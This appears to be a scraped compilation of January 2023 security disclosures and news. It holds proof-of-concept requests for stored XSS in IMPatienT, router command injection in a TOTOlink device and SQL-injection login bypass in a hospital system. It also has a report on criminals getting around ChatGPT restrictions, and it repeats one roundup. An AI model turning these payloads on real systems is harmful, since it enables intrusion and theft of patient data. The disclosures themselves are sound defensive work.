IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.

A Security Advisory has been raised for IMPatienT v1.5.0 (CVE-2023-23637):

Description:  
IMPatienT v1.5.0 allows Stored Cross-Site Scripting (XSS) via onmouseover in certain text fields within a PATCH /modify\_onto request.  
This may allow attackers to steal Protected Health Information (PHI).

Suggested Fix:  
Consider sanitizing user input parameters by removing all non-compliant characters. Additionally, you could consider encoding the user input using HTML or URL methods.

Reference:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23637  
https://nvd.nist.gov/vuln/detail/CVE-2023-23637  
https://owasp.org/www-project-top-ten/2017/A7\_2017-Cross-Site\_Scripting\_(XSS)

Payload:

    PATCH /modify_onto HTTP/1.1
    Host: 127.0.0.1:5000
    Content-Length: 2218
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
    Origin: http://127.0.0.1:5000/
    Referer: http://127.0.0.1:5000/ontocreate
    Connection: close
    
    [{"id":"MHO:000001","text":"Sample Keyword","icon":true,"li_attr":{"id":"MHO:000001"},"a_attr":{"href":"#","id":"MHO:000001_anchor"},"state":{"loaded":true,"opened":true,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"Sample Keyword","hex_color":"#c7ef34","hpo_datamined":"","correlates_with":"","image_annotation":false},"parent":"#"},{"id":"MHO:000004","text":"Keyword Image Annotation","icon":true,"li_attr":{"id":"MHO:000004"},"a_attr":{"href":"#","id":"MHO:000004_anchor"},"state":{"loaded":true,"opened":false,"selected":true,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"UNCLEAR","gene_datamined":"N/A","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#77e3a4","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000005","text":"Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>","icon":true,"li_attr":{"id":"MHO:000005"},"a_attr":{"href":"#","id":"MHO:000005_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#094f6a","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000002","text":"Sample Keyword Child","icon":true,"li_attr":{"id":"MHO:000002"},"a_attr":{"href":"#","id":"MHO:000002_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#14cd17","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000003","text":"Sample Keyword Child 2","icon":true,"li_attr":{"id":"MHO:000003"},"a_attr":{"href":"#","id":"MHO:000003_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#d9eab9","hpo_datamined":""},"parent":"MHO:000001"}]

CVE-2023-23637: [Security] IMPatienT v1.5.0 Stored Cross-Site Scripting (XSS) - CVE-2023-23637 · Issue #101 · lambda-science/IMPatienT

TOTOlink A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection Vulnerability in the httpd service. An attacker can obtain a stable root shell through a specially constructed payload.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取rsabits参数下的内容传递给v8，之后带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"rsabits":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-47853: ttt/16 at main · Am1ngl/ttt

Debian Linux Security Advisory 5317-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5317-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 13, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0141 CVE-2023-0140 CVE-2023-0139 CVE-2023-0138                 CVE-2023-0137 CVE-2023-0136 CVE-2023-0135 CVE-2023-0134     CVE-2023-0133 CVE-2023-0132 CVE-2023-0131 CVE-2023-0130     CVE-2023-0129 CVE-2023-0128Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), this problem has been fixed inversion 109.0.5414.74-2~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPBrfQACgkQEMKTtsN8TjbGjQ/+KfI0HcNDER9opW3i/NGsUubDFjtGSH2Bdh0I7CG0MFYo9jWbkskq9F/KjYHgJLTqXEZ7ZUiE/xUYDg20Ad8y1eJ8vZC4dlNaPX1SakdvAPC5HEgPFNjEO60i4SU/9y7+ujHIuuZiX7N7ATXUG7VRBTOCIFRraMzQ7iIFp3XlNPlPhW5T0XHkf+8oCl3ncFE/JCsEL22juORB93/Ws0MD7sc+Zn2F9HtIEc8PFe1PWs9xYqrT3YZXhI6jq77dcJBHzKzehWSOaDwmRWZ/PXjO5z4vM8rpcDOKQaAW55SAszu2BPNRHCph0OEibcg3Tul/sOKcnjAG2UwKf1dVDEwUf6tcvk1/pIdkpVVurH0AHUU86qlLAimDNwIIyNwpxGACaa9d81GjwPp/pR0CcC38ttJaqCQMEf68F65dy/8GFBab/HrB8lDEB2tL/dWCFzWehcfntcr+mVsxktB8mY0FJWC6JIoQPJA3BALmH95duUmDYlcIYsjPipiFj74+IAUijIgVeyCCl/6jJ1TWQSlHuMnMJIVzzGEDH3DGXiLaE2ZRDHap8y/IBbDXeHRZ8YQ1CwBSaTeyHrp7zBPL2iu4LsJzT6c7zijvJClJGHkzhBbUlDyPc4G1ew20p4BnOBTOiDa4Vxyg8NnCREPjHW7oR2S7FhraDjAK/8g4t87cUy8==11U3-----END PGP SIGNATURE-----

Debian Security Advisory 5317-1

**According to the CVSS metric, a successful exploitation could lead to a scope change (S:C). What does this mean for this vulnerability?**

This vulnerability could lead to a browser sandbox escape.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221216**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221216)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-21795: Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

Categories: News
Tags: Google

Tags:  Chromium

Tags:  Rust

Tags:  memory safety

Tags:  rule of two

Google has announced that it will support the use of third-party Rust libraries in Chromium which is a step forward in memory safety for the browsers.



(Read more...)




The post Google to support the use of Rust in Chromium appeared first on Malwarebytes Labs.

In a blog by the Chrome security team we learned that the Chromium project is going to support the use of third-party Rust libraries from C++ in Chromium.

This is good news because Rust is a so-called memory-safe programming language. So using it in a widespread program like Chrome and the other members of the Chromium family means that almost everyone can benefit from this step forward.

Besides Google’s own Chrome browser, Microsoft Edge, Opera, and many other browsers are based on Chromium code. Reportedly, there are over 25 million lines of code in 36 programming languages in the Chromium browser codebase.

**Rust**

Rust is a community project and the product is a high-level, general-purpose programming language that enforces memory safety. Rust started in 2006 as a personal project by Mozilla Research employee Graydon Hoare as part of the development of the Servo browser engine. Then, in February 2021, the Servo team was disbanded and the Rust Foundation was announced by its five founding companies (AWS, Huawei, Google, Microsoft, and Mozilla).

Rust is designed to be memory safe, because poor memory management has been the root cause for way too many vulnerabilities, for way too long. Only a few months ago, the NSA urged a shift to memory safe programming languages.

**Memory vulnerabilities**

If you ever read our posts describing security vulnerabilities, you will see a lot of phrases like "buffer overflow", "failure to release memory", "use after free", "memory corruption", and "memory leak". These are all memory management issues. And the best way to prevent memory management issues is to use a memory-safe language, which manages memory automatically instead of relying on a programmer to code things correctly.

In an earlier article about the effects of the introduction of memory safe languages in Android we showed a steady decline of memory safety vulnerabilities in Android. With the introduction of memory-safe languages like Kotlin, Java, and Rust in the development of the Android operating system, the contributions to the software that ties everything together in the background coded in C and C++ have gone down considerably.

**Rule of two**

Google’s goals for allowing the use of Rust libraries in Chromium are to provide a simpler and safer way to satisfy the rule of two, in order to speed up development and improve the security of Chrome.

The rule of two is demonstrated in the image below:

_Image courtesy of Google_

It says not to pick more than two of these possibly unsafe circumstances:

*   untrustworthy inputs
*   unsafe implementation language
*   high privilege

By eliminating the “code written in an unsafe language” factor wherever you can, you lessen the need to run code in a sandbox. So, there is less code needed and less need for security reviews. This speeds up development while improving the security. Eliminating the untrustworthy input is almost impossible when you are working on a browser.

The Chrome browser runs as an OS-level account representing a person which is considered a high privilege. In Chrome, sandboxing is applied to attain privilege reduction, which means running the code in a process that has had some or many of its privileges revoked.

**Libraries**

Rust was set out to be the foundation for a secure browser and has already proven its use in a browser for Mozilla. But for now, Google will only support third-party libraries. Third-party libraries are written as standalone components, they don’t hold implicit knowledge about the implementation of Chromium.

For future developments, Google is investing in Crubit, an experiment in how to increase the fidelity of interop between C++ and Rust and express or encapsulate the requirements of each language to the other.  Interop refers to two or more browsers behaving the same.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Google to support the use of Rust in Chromium

By Waqas
One of the threat actors inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.
This is a post from HackRead.com Read the original post: Russian Hackers Eager to Bypass OpenAI’s Restrictions to Abuse ChatGPT

Russian hacker forums have been flooded with queries wondering how hackers can bypass OpenAI’s restrictions to exploit ChatGPT for spreading malware and other day-to-day criminal operations.

Hackread.com earlier **reported** how hackers are abusing ChatGPT to deploy malware. As per the latest news, Russian hackers are now trying to bypass OpenAI restrictions to exploit ChatGPT for malicious purposes.

According to Check Point Research (CPR), Russian hackers are trying to bypass OpenAI‘s restrictions for the malicious use of ChatGPT. For your information, ChatGPT is an OpenAI-owned chatbot launched in November 2022.

An article published on a Russian hacker forum (Image shared with Hackread.com by Check Point)

It is designed on the GPT-3 family of large language models and has been fine-tuned with reinforcement and supervised learning techniques. Its core function is mimicking human conversations, but the chatbot is highly versatile and features voice improvisation skills. 

Such as it can debug or write computer programs for composing music, fairy tales, teleplays, and even essays. Moreover, it can answer test questions, write poetry and lyrics, and emulate a Linux system.

**Russian Hackers and ChatGPT**

Given its versatility, Russian hackers are looking to bypass OpenAI’s API restrictions to access this chatbot. Check Point researchers identified discussions on underground hacking forums where threat actors shared details on how to circumvent IPs, phone numbers, and payment card restrictions, which are essential for using this platform from Russia.

Threat Intelligence Group Manager at Check Point Software Technologies, Sergey Shykevich, said that it isn’t challenging to bypass OpenAI’s restrictions for specific countries as it is easier there to access ChatGPT.

“Right now, we are seeing Russian hackers already discussing and checking how to get past the geofencing to use ChatGPT for their malicious purposes. We believe these hackers are most likely trying to implement and test ChatGPT into their day-to-day criminal operations.”

CPR has shared screenshots of these discussions. In one of the threads, a threat actor inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.

(Image shared with Hackread.com by Check Point)

In another thread, a cybercriminal is asking about bypassing the platform’s Geo Controls. In the third screenshot.

The third screenshot shows a tutorial shared on the hacking forums in Russian semi-legal online SMS services and how to use them to register ChatGPT.

(Image shared with Hackread.com by Check Point)

“Cybercriminals are growing more and more interested in ChatGPT because the AI technology behind it can make a hacker more cost-efficient,” Shykevich added.

**What if cyber criminals use AI?**

Artificial Intelligence **(AI) has been a boon to cybersecurity companies** and countless businesses, allowing them to automate processes and optimize their performance. But what if this powerful technology was used for nefarious purposes? Recent reports suggest that advances in AI are making it easier for cybercriminals to launch attacks on networks and steal valuable data.

Cybercriminals have long relied on automation tools to hide their activities from detection, but with the help of AI, they can take these tactics one step further. For example, attackers can use deep learning algorithms and natural language processing techniques to create more convincing phishing emails that can be used as part of larger schemes.

In addition, AI-based malware is becoming increasingly sophisticated, enabling it to evade traditional security measures like **anti-virus software** and **firewalls**.

1.  AI-based Model to Predict Extreme Wildfire Danger
2.  Website uses AI to create utterly realistic human faces
3.  Microsoft patent reveals chatbot to talk to dead people
4.  This AI Can Generate Unique and Free Bored Ape NFTs
5.  AI-Powered Smart Glasses Give Deafs Power of Speech
6.  ‘Fawkes’ privacy tool blocks images from facial recognition
7.  Retired Software Exploited To Target Power Grids, Microsoft
8.  Spyware Vendor Exploited Chrome, Firefox, Windows 0-days

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Russian Hackers Eager to Bypass OpenAI’s Restrictions to Abuse ChatGPT

Hospital Management System v1.0 is vulnerable to SQL Injection. Attackers can gain administrator privileges without the need for a password.

**CVE Disclosures**

Author: Frank Zeng

**The CVE ID for the entry： **CVE-2022-46093****

**A prose description:** SQL injection vulnerability in Hospital Management System via **a crafted POST request** to /Hospital-Management-System-master/func3.php.

**Root Cause and Impact:** Although the user name is restricted on the front page of the administrator login, the password is not effectively restricted and validated, allowing the attacker to use the vulnerable code for sql injection attacks. The sql statement executed on the server is as follows: select \* from admintb where username='admin@admin.com' and password='1' or username='admin';

Then,attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

**The name of an affected Product:** Hospital Management System

**The affected or fixed version:** v1.0

**Vendors:** https://github.com/kishan0725/Hospital-Management-System

**Vulnerability Type:** SQL Injection of Post Type

**Payload:** username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**HTTP Request:**

POST /Hospital-Management-System-master/func3.php HTTP/1.1
Host: localhost
Content-Length: 77
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/Hospital-Management-System-master/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=99cunoplmskd7cjgrmp5l9unbt
Connection: close

username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**Vulnerability url:** /Hospital-Management-System-master/index.php

**Vulnerability location:** /Hospital-Management-System-master/fun3.php

**Proof：**

**Supplementary information：**

**The attack process of manually entering the payload in the login box:**

The sql statement executed on the server is as follows: select \* from admintb where username='admin' and password='1' or username='admin';

Enter in the User Name column of the login box: **admin@admin.com** Enter in the Password column of the login box: **1' or username='admin**

**Request package**：Bypass checking the password

At this time, the password authentication is bypassed and the administrator account is successfully logged in.

Attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

CVE-2022-46093: z-vulnerabilitys/Hospital-Management-System.md at main · Frank-Z7/z-vulnerabilitys

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Jessica Haworth 13 January 2023 at 18:31 UTC  
Updated: 16 January 2023 at 14:29 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Slack suffered a security breach recently, “involving unauthorized access to a subset of Slack’s code repositories” according to the messaging platform.

The company said that although no customers were affected, an internal investigation revealed that an unknown actor downloaded private code repositories on or around December 27.

“We discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository,” a statement read.

“No downloaded repositories contained customer data, means to access customer data or Slack’s primary codebase.”

Identity management company Okta also fell victim to a breach when an unknown actor accessed its code repositories.

The incident occurred “in early December 2022”, the vendor said, without confirming whether or not any data was stolen.

It did confirm that it “promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications”.

And over in the US, a government watchdog spent $15,000 to build a password-cracking program – only to discover employees were using easily-guessable credentials all along.

The complicated software, financed by the Department of the Interior, was designed to take on tasks such as recovering hashed passwords.

However it ultimately found that it was able to recover nearly 14,000 employee passwords, – 16% of all department accounts – due to “easily cracked passwords, lack of multifactor authentication, and other failures”.

Among other stories from The Daily Swig in recent days were secure messaging app Threema disputing the seriousness of flaws in its software, developers being urged to rotate secrets in CircleCI due to a security breach, and cross-origin resource (CORS) misconfigurations in the environments of enterprises including Tesla that left internal networks vulnerable.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Cisco / Critical / RCE, authentication bypass vulnerabilities / Disclosed with patch, January 11
*   CKEditor / Critical / CSRF vulnerability in CKEditor can lead to RCE (remote code execution) in XWiki / Patched in CKEditor Integration version 1.64.3
*   Mozilla / Moderate / Attacker could inject markup due to the fact Firefox failed to implement the unsafe-hashes CSP (content security policy) directive / Disclosed with patch, December 13
*   VMWare / Critical / Command injection, directory traversal vulnerabilities / Patched in VMWare vRealize Network Insight v6.8
*   Zoom / Medium, High / Path traversal, local privilege escalation bugs for Windows, Android, MacOS clients / Patched January

**Research and attack techniques**

*   Researchers from Sonarsource discovered a command injection vulnerability as well as an authentication bypass vulnerability in open source web-based monitoring tool Cacti which allowed unauthenticated exploitation.
*   A malicious Python file found on the PyPi repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK (software development kit) client from security firm SentinelOne, researchers at ReversingLabs have reported.
*   Also concerning PyPi, researcher Tom Forbes found 57 valid AWS keys present on the Python package index belonging to Amazon, Intel, and other organizations by scanning new packages with GitHub Actions.
*   A research team from Imperva demonstrated how they discovered a vulnerability in Google Chrome that led to the theft of sensitive files, such as crypto wallets and cloud provider credentials.
*   And Harsh Bothra from Cobalt released this handy write up on how pen testers can spot prototype pollution-style attacks.
**Bug bounty/vulnerability disclosure**

*   Researcher Matt Kunze netted a $107,500 bug bounty reward from Google for reporting vulnerabilities in the Google Home Mini smart speaker which allowed him to access the microphone on the device and make arbitrary HTTP requests on the local network.
*   Security firm CloudSek released BeVigil, a tool to enable bug bounty hunters to find and report vulnerabilities in mobile apps.
*   And hacker Jerry Gamblin published this extensive guide on the CVE year in review, featuring data on assigned vulnerabilities from the year 2022.
**New open source infosec/hacking tools**

*   GCP Goat is a vulnerable cloud infrastructure tool featuring the latest released OWASP Top 10 web application security risks and other misconfiguration, designed to help test developers test their code in a cloud environment.
*   Another cloud-based tool, PEACH is a tenant isolation framework for cloud applications to help protect against malicious actors accessing “data belonging to other customers”, for example, in cases such as ChaosDB, ExtraReplica, and AttachMe.
*   Open source tool sbom-utility has been released, an API platform for validating, querying, updating, and managing standardized SBOMs.
**For devs**

*   Exact Realty has released this blog post explaining how developers can defend against introducing cross-site request forgery (CSRF) vulnerabilities into websites.
*   Google’s Chromium project now supports the use of third-party Rust libraries from C++, and will include Rust code in the Chrome binary “within the next year”.
**For fun**

Finally, SplendidData’s bonkers bug bounty program policy was subject to online infosec scrutiny recently.

The rules date back to at least early 2021, however it still sparked a lively discussion thread on Twitter over the last week as some of its questionable terms were highlighted.

Its policy boasts guidance such as ‘we will not respond to your request’ and that the company ‘cannot guarantee’ that no legal action will be taken, even if the vulnerability was disclosed responsibly.

Unsurprisingly, this spread like wildfire on infosec Twitter with one user called TJ joking: “I like the “we MIGHT sue you, idk” aspect… adds a little excitement to life.”

RECOMMENDED Prototype pollution-like bug variant discovered in Python

Deserialized web security roundup – Slack and Okta breaches, lax US government passwords report, and more&nbsp;

Jessica Haworth 13 January 2023 at 18:31 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Slack suffered a security breach recently, “involving unauthorized access to a subset of Slack’s code repositories” according to the messaging platform.

The company said that although no customers were affected, an internal investigation revealed that an unknown actor downloaded private code repositories on or around December 27.

“We discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository,” a statement read.

“No downloaded repositories contained customer data, means to access customer data or Slack’s primary codebase.”

Identity management company Okta also fell victim to a breach when an unknown actor accessed its code repositories.

The incident occurred “in early December 2022”, the vendor said, without confirming whether or not any data was stolen.

It did confirm that it “promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications”.

And over in the US, a government watchdog spent $15,000 to build a password-cracking program – only to discover employees were using easily-guessable credentials all along.

The complicated software, financed by the Department of the Interior, was designed to take on tasks such as recovering hashed passwords.

However it ultimately found that it was able to recover nearly 14,000 employee passwords, – 16% of all department accounts – due to “easily cracked passwords, lack of multifactor authentication, and other failures”.

Among other stories from The Daily Swig in recent days were secure messaging app Threema disputing the seriousness of flaws in its software, developers being urged to rotate secrets in CircleCI due to a security breach, and cross-origin resource (CORS) misconfigurations in the environments of enterprises including Tesla that left internal networks vulnerable.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Cisco / Critical / RCE, authentication bypass vulnerabilities / Disclosed with patch, January 11
*   CKEditor / Critical / CSRF vulnerability in CKEditor can lead to RCE (remote code execution) in XWiki / Patched in CKEditor Integration version 1.64.3
*   Mozilla / Moderate / Attacker could inject markup due to the fact Firefox failed to implement the unsafe-hashes CSP (content security policy) directive / Disclosed with patch, December 13
*   VMWare / Critical / Command injection, directory traversal vulnerabilities / Patched in VMWare vRealize Network Insight v6.8
*   Zoom / Medium, High / Path traversal, local privilege escalation bugs for Windows, Android, MacOS clients / Patched January

**Research and attack techniques**

*   Researchers from Sonarsource discovered a command injection vulnerability as well as an authentication bypass vulnerability in open source web-based monitoring tool Cacti which allowed unauthenticated exploitation.
*   A malicious Python file found on the PyPi repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK (software development kit) client from security firm SentinelOne, researchers at ReversingLabs have reported.
*   Also concerning PyPi, researcher Tom Forbes found 57 valid AWS keys present on the Python package index belonging to Amazon, Intel, and other organizations by scanning new packages with GitHub Actions.
*   A research team from Imperva demonstrated how they discovered a vulnerability in Google Chrome that led to the theft of sensitive files, such as crypto wallets and cloud provider credentials.
*   And Harsh Bothra from Cobalt released this handy write up on how pen testers can spot prototype pollution-style attacks.
**Bug bounty/vulnerability disclosure**

*   Researcher Matt Kunze netted a $107,500 bug bounty reward from Google for reporting vulnerabilities in the Google Home Mini smart speaker which allowed him to access the microphone on the device and make arbitrary HTTP requests on the local network.
*   Security firm CloudSek released BeVigil, a tool to enable bug bounty hunters to find and report vulnerabilities in mobile apps.
*   And hacker Jerry Gamblin published this extensive guide on the CVE year in review, featuring data on assigned vulnerabilities from the year 2022.
**New open source infosec/hacking tools**

*   GCP Goat is a vulnerable cloud infrastructure tool featuring the latest released OWASP Top 10 web application security risks and other misconfiguration, designed to help test developers test their code in a cloud environment.
*   Another cloud-based tool, PEACH is a tenant isolation framework for cloud applications to help protect against malicious actors accessing “data belonging to other customers”, for example, in cases such as ChaosDB, ExtraReplica, and AttachMe.
*   Open source tool sbom-utility has been released, an API platform for validating, querying, updating, and managing standardized SBOMs.
**For devs**

*   Exact Realty has released this blog post explaining how developers can defend against introducing cross-site request forgery (CSRF) vulnerabilities into websites.
*   Google’s Chromium project now supports the use of third-party Rust libraries from C++, and will include Rust code in the Chrome binary “within the next year”.
**For fun**

Finally, SplendidData’s bonkers bug bounty program policy was subject to online infosec scrutiny recently.

The rules date back to at least early 2021, however it still sparked a lively discussion thread on Twitter over the last week as some of its questionable terms were highlighted.

Its policy boasts guidance such as ‘we will not respond to your request’ and that the company ‘cannot guarantee’ that no legal action will be taken, even if the vulnerability was disclosed responsibly.

Unsurprisingly, this spread like wildfire on infosec Twitter with one user called TJ joking: “I like the “we MIGHT sue you, idk” aspect… adds a little excitement to life.”

RECOMMENDED Prototype pollution-like bug variant discovered in Python

Deserialized web security roundup – Slack, Okta security breaches, lax US government passwords report, and more&nbsp;

Rhadamanthys spreads through Google Ads that redirect to bogus download sites for popular workforce software — as well as through more typical malicious emails.

A sneaky new info stealer is sliding onto user machines via website redirects from Google Ads that pose as download sites for popular remote-workforce software, such as Zoom and AnyDesk.

Threat actors behind the new malware strain, "Rhadamanthys Stealer" — available for purchase on the Dark Web under a malware-as-a-service model — are using two delivery methods to propagate their payload, researchers from Cyble revealed in a blog post published Jan. 12.

One is through carefully crafted phishing sites that impersonate download sites not only for Zoom but also AnyDesk, Notepad++, and Bluestacks. The other is through more typical phishing emails that deliver the malware as a malicious attachment, the researchers said.

Both delivery methods pose a threat to the enterprise, as phishing combined with human gullibility on the part of unsuspecting corporate workers continues to be a successful way for threat actors "to gain unauthorized access to corporate networks, which has become a serious concern," they said.

Indeed, an annual survey by Verizon on data breaches found that in 2021, about 82% of all breaches involved social engineering in some form, with threat actors preferring to phish their targets via email more than 60% of the time.

**"Highly Convincing" Scam**

Researchers detected a number of phishing domains that the threat actors created to spread Rhadamanthys, most of which appear to be legitimate installer links for the various aforementioned software brands. Some of the malicious links they identified include: _bluestacks-install\[.\]com, zoomus-install\[.\]com, install-zoom\[.\]com, install-anydesk\[.\]com, and zoom-meetings-install\[.\]com_.

"The threat actors behind this campaign … created a highly convincing phishing webpage impersonating legitimate websites to trick users into downloading the stealer malware, which carries out malicious activities," they wrote.

If users take the bait, the websites will download an installer file disguised as a legitimate installer to download the respective applications, silently installing the stealer in the background without the user knowing, the researchers said.

In the more traditional email aspect of the campaign, attackers use spam that leverage the typical social engineering tool of portraying an urgency to respond to a message with a financial theme. The emails purport to be sending account statements to recipients with a Statement.pdf attached that they are advised to click on so they can reply with an "immediate response."

If someone clicks on the attachment, it displays a message indicating that it's an "Adobe Acrobat DC Updater" and includes a download link labelled "Download Update." That link, once clicked on, downloads a malware executable for the stealer from the URL _"https\[:\]\\\\zolotayavitrina\[.\]com/Jan-statement\[.\]exe"_ into the victim machine's Downloads folder, the researchers said.

Once this file is executed, the stealer is deployed to lift sensitive data such as browser history and various account log-in credentials — including specific technology to target crypto-wallet — from the target's computer, they said.

**The Rhadamanthys Payload**

Rhadamanthys acts more or less like a typical info stealer; however, it does have some unique features that researchers identified as they observed its execution on a victim's machine.

Though its initial installation files are in obfuscated Python code, the eventual payload is decoded as a shellcode in the form of a 32-bit executable file compiled with Microsoft visual C/C++ compiler, the researchers found.

The shellcode's first order of business is to create a mutex object aimed at ensuring that only one copy of the malware is running on the victim's system at any given time. It also checks to see if it's running on a virtual machine, ostensibly to prevent the stealer from being detected and analyzed in a virtual environment, the researchers said.

"If the malware detects that it is running in a controlled environment, it will terminate its execution," they wrote. "Otherwise, it will continue and perform the stealer activity as intended."

That activity includes collecting system information — such as computer name, username, OS version, and other machine details — by executing a series of Windows Management Instrumentation (WMI) queries. That's followed up by a query of the directories of the installed browsers — including Brave, Edge, Chrome, Firefox, Opera Software, and others — on the victim’s machine to search for and steal browser history, bookmarks, cookies, auto-fills, and login credentials.

The stealer also has a specific mandate to target various crypto wallets, with specific targets such as Armory, Binance, Bitcoin, ByteCoin, WalletWasabi, Zap, and others. It also steals data from various crypto-wallet browser extensions, which are hardcoded in the stealer binary, the researchers said.

Other applications targeted by Rhadamanthys are: FTP clients, email clients, file managers, password managers, VPN services, and messaging apps. The stealer also captures screenshots of the victim’s machine. The malware eventually sends all the stolen data to the attackers' command-and-control (C2) server, the researchers said.

**Dangers to the Enterprise**

